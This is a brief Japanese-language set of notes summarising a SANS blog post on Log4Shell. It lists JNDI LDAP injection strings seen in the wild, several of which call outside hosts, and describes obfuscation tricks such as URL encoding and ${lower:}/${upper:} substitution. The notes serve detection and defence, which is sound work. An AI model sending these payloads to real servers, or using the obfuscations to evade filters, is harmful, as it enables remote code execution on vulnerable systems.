【ブログ】
◆Log4j / Log4Shell Followup: What we see and how to defend (and how to access our data) (SANS, 2021/12/11)
https://isc.sans.edu/forums/diary/Log4j+Log4Shell+Followup+What+we+see+and+how+to+defend+and+how+to+access+our+data/28122/
【詳細】
■攻撃パターン
${jndi:ldap://aa895bba3900.bingsearchlib.com:39356/a}
■難読化
◇URLエンコード
- $%7b => {
- $%7d => }
◇upper / lower
- ${lower:l} => l
- ${upper:a} => A
■難読化事例
/$%7Bjndi:ldap://45.130.229.168:1389/Exploit%7D
/$%7Bjndi:ldap://x-ios-validation.com.lc1wnt7yguuuk0qurdw600boffl59u.burpcollaborator.net%7D
${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
=> ${jndi:ldap://world80.log4j.binAryedge.io:80/callback}